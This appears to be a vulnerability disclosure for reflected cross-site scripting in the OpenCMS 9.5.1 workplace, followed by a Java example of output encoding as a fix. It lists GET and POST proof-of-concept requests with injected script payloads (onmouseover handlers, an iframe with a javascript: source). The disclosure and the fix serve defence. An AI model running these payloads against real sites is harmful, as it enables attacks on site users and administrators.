Description
During some security testing I have identified the following XSS (reflected) vulnerabilities. The OpenCMS 9.5.1 workplace does not properly validate pages and parameters throughout the application.
Request Method: GET
- /opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--
- /opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//
- /opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';[XSS PAYLOAD]
- /opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";[XSS PAYLOAD]
Request Method: POST
POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Content-Length: 104

action=search&query=<iframe src=javascript:confirm(0) &index=German+online+help&searchPage=1&query2=1234
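The requests above break out of their output context with a quote character (`"` before `onmouseover`, `';` and `";` after the `path` and `mode` values). The sketch below is an added example, not OpenCms code: it shows context-specific output encoding applied to those same values, assuming they are reflected into a quoted HTML attribute and a quoted JavaScript string; the class and method names are hypothetical.

```java
public class ReflectedParamEncoding {
    static boolean isAlnum(int c) {
        return (c >= '0' && c <= '9') || (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z');
    }

    // HTML attribute / HTML text context: every non-alphanumeric code point
    // becomes a numeric character reference, so a quote or '<' stays data.
    static String forHtmlAttribute(String value) {
        StringBuilder out = new StringBuilder();
        value.codePoints().forEach(cp -> {
            if (isAlnum(cp)) {
                out.appendCodePoint(cp);
            } else {
                out.append("&#x").append(Integer.toHexString(cp)).append(';');
            }
        });
        return out.toString();
    }

    // JavaScript string-literal context: every non-alphanumeric UTF-16 unit
    // becomes a four-digit hex escape, so ' and " cannot close the literal.
    static String forJsString(String value) {
        StringBuilder out = new StringBuilder();
        for (char c : value.toCharArray()) {
            if (isAlnum(c)) {
                out.append(c);
            } else {
                out.append(String.format("\\u%04x", (int) c));
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Parameter values from the requests listed above, URL-decoded ('+' is a space).
        String homelink = "\" onmouseover=\"javascript:confirm(0);\">Click HERE<!--";
        String path = "/publishqueue';";
        String mode = "explorerview\";";
        String query = "<iframe src=javascript:confirm(0) ";

        // Assumed sinks: the surrounding markup is illustrative only.
        System.out.println("<a title=\"" + forHtmlAttribute(homelink) + "\">home</a>");
        System.out.println("<p>Results for " + forHtmlAttribute(query) + "</p>");
        System.out.println("var path = '" + forJsString(path) + "';");
        System.out.println("var mode = \"" + forJsString(mode) + "\";");
    }
}
```

If a value ends up in a URL-bearing attribute such as `href` or `src`, encoding alone is not enough; the scheme also has to be checked against an allow-list so that `javascript:` is rejected.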